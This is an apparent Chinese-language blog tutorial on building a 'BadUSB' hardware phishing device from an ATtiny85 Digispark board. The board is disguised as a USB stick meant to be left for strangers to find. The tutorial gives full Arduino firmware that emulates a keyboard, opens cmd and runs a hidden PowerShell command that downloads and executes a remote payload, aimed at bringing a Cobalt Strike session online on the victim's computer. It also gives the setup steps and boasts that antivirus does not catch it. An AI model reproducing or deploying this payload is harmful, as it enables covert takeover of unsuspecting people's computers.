打造硬件钓鱼式攻击

  • A+
所属分类:安全文章

欢迎转载,请勿抄袭!

        在茫茫的人海中,走着路,突然看到地上有个像U盘的东西,于是捡了起来。回到家,不忙不急插入电脑看看里面有什么,忽然一闪的黑窗口。之后识别不出。就扔进垃圾桶。

        那么恭喜你,我的CS上线了,哈哈哈~~

打造硬件钓鱼式攻击

        那么,如何实现的呢?其实你捡到的只是一个类似于键盘的硬件,里面写有所执行cmd命令而已。当你插入U盘,设好等到加载时间,直接执行cmd,执行木马。有人会问,我电脑有杀毒软件,怕啥?遗憾告诉你,杀毒软件,不杀硬件。啊哈哈哈~~~(不落地的木马)

        制作一个这种成本大概10块钱左右,本测试使用了Attiny85,于是就不折腾了,直接买了一个带USB的,某宝也有带U盘外壳;有些老板还可以帮你印个64G哈哈哈

打造硬件钓鱼式攻击

不说了,直接开始整吧,我自己买的是Attiny85,不带外壳的,长这样子

打造硬件钓鱼式攻击

去arduino官网下载软件,这个软件作为烧录作用,把代码编译成二进制固件,之后烧写进去。

 准备流程:

usb虚拟键盘arduino IDE下载https://www.arduino.cc/en/Main/Softwaredigispark驱动下载https://github.com/digistump/DigistumpArduino/releases

然后在arduino IDE加入对digispark开发板的支持

在文件->首选项中加入附加开发板管理

http://digistump.com/package_digistump_index.json


打造硬件钓鱼式攻击

在工具->开发板中打开开发板管理器,找到digistump,然后安装它!这个安装过程可能会有点久。最好使用代理安装,只能线上安装,所以提供不了安装包~

打造硬件钓鱼式攻击

安装好之后,在工具中选中开发板Digispark (Default - 16.5mHz)

打造硬件钓鱼式攻击

配置好以后,创建项目将代码放进去,测试代码,点击上传

#include "DigiKeyboard.h"void setup() {  // put your setup code here, to run once:  DigiKeyboard.delay(2000);  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);  DigiKeyboard.delay(300);  DigiKeyboard.println("cmd");  DigiKeyboard.delay(300);  DigiKeyboard.println("echo OK");}void loop() {  }


点击上传以后出现下图

打造硬件钓鱼式攻击

意思是你在60秒插入digispark就能上传了,这时候在usb插入Attiny85模块

打造硬件钓鱼式攻击

这样子显示,就是烧写完毕了~~~离成功又进一步了。再将Attiny85模块插入电脑,就会弹出

打造硬件钓鱼式攻击

接下来修改代码,将echo OK替换成CS的不落地神马。

#include "DigiKeyboard.h"//库文件void setup() {  // setup函数只运行一次  DigiKeyboard.delay(2000);//等待两秒,给电脑自动加载配置时间  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//摁住WIN键  DigiKeyboard.delay(300);//等待300毫秒  DigiKeyboard.println("cmd");//输入CMD  DigiKeyboard.delay(300);  DigiKeyboard.println("powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx'))"");//执行PAYLOAD,双引号需要斜杠转义}void loop() {}

安装上面的步骤再来一遍,就好了~

还没进群的粉丝,进群一起学习交流哈,加小编,小编带你进群!!!

文章声明:该工具、教程仅供学习参考,请勿非法使用。否则与作者无关!

打造硬件钓鱼式攻击
打造硬件钓鱼式攻击
打造硬件钓鱼式攻击

识别二维码,关注我们


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: